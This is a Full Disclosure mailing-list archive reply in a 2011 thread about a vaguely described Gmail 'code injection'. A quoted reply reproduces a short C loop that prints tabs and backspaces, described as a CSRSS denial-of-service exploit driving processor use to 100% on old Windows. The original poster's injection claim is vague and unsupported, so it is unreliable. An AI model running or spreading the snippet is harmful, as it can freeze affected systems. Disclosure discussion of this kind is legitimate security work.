|
Full Disclosure
mailing list archives
Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now...
From: "-= Glowing Doom =-" <secn3t () gmail com>
Date: Sun, 12 Jun 2011 11:33:17 +1000
This is NOT coded.. the PoC i am explaining, is possible with simply
copyying text,then using a sequence of keys, to make the actual sentence/s,
appear.
This code is not what shows up when it is dissected.
It shows up with many x41 all over the email when it is done properly .
Regards.
On 12 June 2011 11:29, Christian Sciberras <uuf6429 () gmail com> wrote:
For those lazy enough to search:
https://www.owasp.org/index.php/The_CSRSS_Backspace_Bug_still_works_in_windows_2003_sp1
Excerpt:
Basicaly just compile this and you will get a 100% processor usage by the
compiled exploit and Csrss.exe
#include <stdio.h>
int main(void)
{
while(1)
printf("\t\t\b\b\b\b\b\b");
return 0;
}
How this helps in sending spam is beyond me.
On Sun, Jun 12, 2011 at 3:18 AM, Jeffrey Walton <noloader () gmail com>wrote:
On Sat, Jun 11, 2011 at 9:06 PM, -= Glowing Doom =- <secn3t () gmail com>
wrote:
It is now, over 1yr old atleast and exists in riched20.dll.
This PoC info is over for me also.
Microsoft had problems with a backspace in the past. Search for "CSRSS
Backspace Bug".
[SNIP
Jeff
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
By Date
By Thread
Current thread:
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now..., (continued)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... Jeffrey Walton (Jun 12)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... Christian Sciberras (Jun 12)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... -= Glowing Doom =- (Jun 12)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... phocean (Jun 12)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... adam (Jun 12)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... -= Glowing Doom =- (Jun 12)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... adam (Jun 12)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... -= Glowing Doom =- (Jun 12)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... -= Glowing Doom =- (Jun 12)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... John R. Dennison (Jun 12)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... phocean (Jun 12)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... Haxxor Security (Jun 12)
- Re: POC for a simple gmail/possible code injection into html wich can be executed in an email, i will make the PoC code and explain how here and now... -= Glowing Doom =- (Jun 12)
(Thread continues...)
|